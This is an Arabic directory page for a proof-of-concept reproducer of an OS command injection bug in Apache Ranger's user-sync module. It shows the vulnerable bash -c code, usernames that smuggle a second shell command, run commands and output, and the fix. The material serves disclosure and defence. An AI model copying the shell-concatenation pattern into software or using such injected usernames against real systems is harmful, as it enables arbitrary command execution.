Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-28672 — مُعيد إنتاج لإثبات المفهوم لثغرة حقن أوامر نظام التشغيل في Apache Ranger UnixUserGroupBuilder (CVE-2026-28672)، توضح الثغرة وتتحقق من الإصلاح. | Kitploit
أدوات/GitHubGitHub/oscerd/cve-2026-28672
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHuboscerd/cve-2026-28672

CVE-2026-28672

مُعيد إنتاج لإثبات المفهوم لثغرة حقن أوامر نظام التشغيل في Apache Ranger UnixUserGroupBuilder (CVE-2026-28672)، توضح الثغرة وتتحقق من الإصلاح.

عرض المستودع
منذ 8س 39دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-28672 — حقن أوامر نظام التشغيل في Apache Ranger UnixUserGroupBuilder

أداة إعادة إنتاج قابلة للتشغيل (proof-of-concept) لثغرة حقن أوامر نظام التشغيل في وحدة مزامنة المستخدمين (unixusersync) الخاصة بـ Apache Ranger.

أثناء تعداد مجموعات كل مستخدم تتم مزامنته، يشغّل UnixUserGroupBuilder أمر id عبر غلاف أوامر (shell)، مُلحِقًا اسم المستخدم بسطر الأوامر:

root@kitploit:~
// ugsync/src/main/java/org/apache/ranger/unixusersync/process/UnixUserGroupBuilder.java  (Ranger <= 2.8.0)
Process process = Runtime.getRuntime().exec(new String[]{"bash", "-c", "id -G " + userName});

يأتي اسم المستخدم من مصدر مزامنة المستخدمين المُهيأ (LDAP/AD أو ملف)، وبالتالي يمكن للمهاجم التأثير فيه. أي اسم مستخدم يحتوي على محارف خاصة بالغلاف — مثل alice; touch /tmp/pwned — يُنفَّذ كأمر نظام تشغيل (CWE-77، عدم تحييد العناصر الخاصة المستخدمة في أمر).

التشغيل

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build
# or, without Docker (needs bash/id/touch on PATH):
java -jar target/cve-2026-28672.jar

المخرجات المتوقعة على مسار الكود المعرض للثغرة:

root@kitploit:~
[1] Benign username 'nobody':
      id -G nobody -> 65534
[2] Malicious username 'nobody; touch /tmp/pwned-28672' (vulnerable <= 2.8.0):
      injected command executed? marker /tmp/pwned-28672 exists = true
[3] Same malicious username through the 2.9.0 FIX (id run directly, no shell):
      id -G 'nobody; touch /tmp/pwned-28672' -> null
      injected command executed? marker exists = false
>>> PROVEN: ... OS command injection (CWE-77): true

ملخص الثغرة

الإصلاح

يُشغِّل Apache Ranger 2.9.0 أمر id مباشرةً كمتجه وسائط (argument vector)، بحيث يصبح اسم المستخدم وسيطًا حرفيًا واحدًا ولا يتم تفسيره أبدًا عبر غلاف أوامر:

root@kitploit:~
// Ranger 2.9.0
Process process = Runtime.getRuntime().exec(new String[] {"id", "-G", userName});

يحتوي UnixUserGroupBuilderVuln.java في هذا المستودع على كلا الصيغتين حرفيًا، مع الإحالة إلى المصدر الأصلي (upstream).

إخلاء المسؤولية

يُنشر هذا المستودع لأغراض تعليمية ودفاعية: لمساعدة مستخدمي Apache Ranger على فهم الثغرة، والتحقق مما إذا كانوا متأثرين بها، والتأكد من أن الترقية تحلّها. الحمولة (payload) غير ضارة (فهي تنشئ ملف علامة داخل /tmp). لا تستخدم هذه المادة ضد أنظمة لا تملكها أو لا تديرها.

تنزيل الأداة
الخاصيةالقيمة
المشروعApache Ranger — org.apache.ranger.unixusersync (مزامنة المستخدمين)
التصنيفCWE-77 عدم تحييد العناصر الخاصة المستخدمة في أمر ('حقن الأوامر')
متجه الهجوماسم مستخدم يحتوي على محارف خاصة بالغلاف يتم تزويده من مصدر مزامنة المستخدمين
الأثرتنفيذ أوامر نظام تشغيل تعسفية على مضيف مزامنة المستخدمين في Ranger
الإصدارات المتأثرةمن 0.6 حتى 2.8
الإصدار المُصحَّح2.9.0
النشرة الأمنيةنقاش lists.apache.org · CVE-2026-28672
جهة الاكتشافAndrea Cosentino